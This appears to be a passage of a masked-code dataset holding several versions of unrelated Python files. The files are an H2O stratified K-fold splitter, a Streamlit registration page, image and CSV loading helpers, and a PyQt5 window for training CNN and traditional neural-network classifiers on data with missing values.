@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
# validate that it's a string
y = _val_y(y) # gets a string back or None
if y is None:
raise ValueError('H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(('All the n_labels for individual classes'
' are less than %d folds.'
% self.n_folds), Warning)
if self.n_folds > min_labels:
warnings.warn(('The least populated class in y has only %d'
' members, which is too few. The minimum'
' number of labels for any class cannot'
' be less than n_folds=%d.'
% (min_labels, self.n_folds)), Warning)
# NOTE FROM SKLEARN:
# pre-assign each sample to a test fold index using individual KFold
# splitting strategies for each class so as to respect the balance of
# classes
# NOTE: Passing the data corresponding to ith class say X[y==class_i]
# will break when the data is not 100% stratifiable for all classes.
# So we pass np.zeroes(max(c, n_folds)) as data to the KFold.
# Remember, however that we might be using the old-fold KFold which doesn't
# have a split method...
if SK18:
per_cls_cvs = [
KFold(self.n_folds, # using sklearn's KFold here
shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds)))
for count in y_counts
]
else:
per_cls_cvs = [
KFold(max(count, self.n_folds), # using sklearn's KFold here
self.n_folds,
shuffle=self.shuffle,
random_state=rng)
for count in y_counts
]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
# the test split can be too big because we used
# KFold(...).split(X[:max(c, n_folds)]) when data is not 100%
# stratifiable for all the classes
# (we use a warning instead of raising an exception)
# If this is the case, let's trim it:
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| [
33,
35,
36,
43,
47
] |
7 | 41cfd558824b6561114a48a694b1e6e6a7cb8c05 | <mask token>
| <mask token>
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
email = remail_input_container.text_input('Email ')
password = rpw_input_container.text_input('Password ', type='password')
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun()
| import streamlit as st
from streamlit.components.v1 import components
from streamlit.report_thread import get_report_ctx
from util.session import *
from multipage import MultiPage
from pages import register
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
email = remail_input_container.text_input('Email ')
password = rpw_input_container.text_input('Password ', type='password')
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun()
| import streamlit as st
from streamlit.components.v1 import components
from streamlit.report_thread import get_report_ctx
from util.session import *
from multipage import MultiPage
from pages import register
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
# title_container.write("Register")
email = remail_input_container.text_input("Email ")
password = rpw_input_container.text_input("Password ", type="password")
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun() | null | [
0,
1,
2,
3
] |
8 | f2bb44600f011a205c71985ad94c18f7e058634f | <mask token>
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
<mask token>
| <mask token>
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
<mask token>
| <mask token>
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[
int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,
List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)
index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)
next_indices = [0] * len(class_cols)
with open(path, 'r', newline='', encoding='utf8') as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
return (metadata, len_metadata, headers, class_to_index, index_to_class,
num_classes)
| import os
import requests
from PIL import Image
from io import BytesIO
import csv
from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[
int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,
List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)
index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)
next_indices = [0] * len(class_cols)
with open(path, 'r', newline='', encoding='utf8') as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
return (metadata, len_metadata, headers, class_to_index, index_to_class,
num_classes)
| import os
import requests
from PIL import Image
from io import BytesIO
import csv
from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection
# pull the image from the api endpoint and save it if we don't have it, else load it from disk
def get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]:
def _apply(filepath: str, url: str) -> Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB') # convert to rgb if not already (eg if grayscale)
return _apply
def from_url(url: str) -> Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) -> Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\
-> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
# one dict for each class col
class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)
index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)
next_indices = [0] * len(class_cols) # next index for a new class value
with open(path, 'r', newline='', encoding="utf8") as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
# for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
# split off the headers
return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes
| [
2,
3,
4,
5,
6
] |
9 | 302605d8bb45b1529742bf9441d476f0276085b9 | <mask token>
class MyMainWindow(QMainWindow):
<mask token>
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'
, self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
<mask token>
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1
] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].
DataTrainX.shape[1], self.combineNumConv
) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'
, self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
<mask token>
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'New'))
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'Tra'))
<mask token>
| <mask token>
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
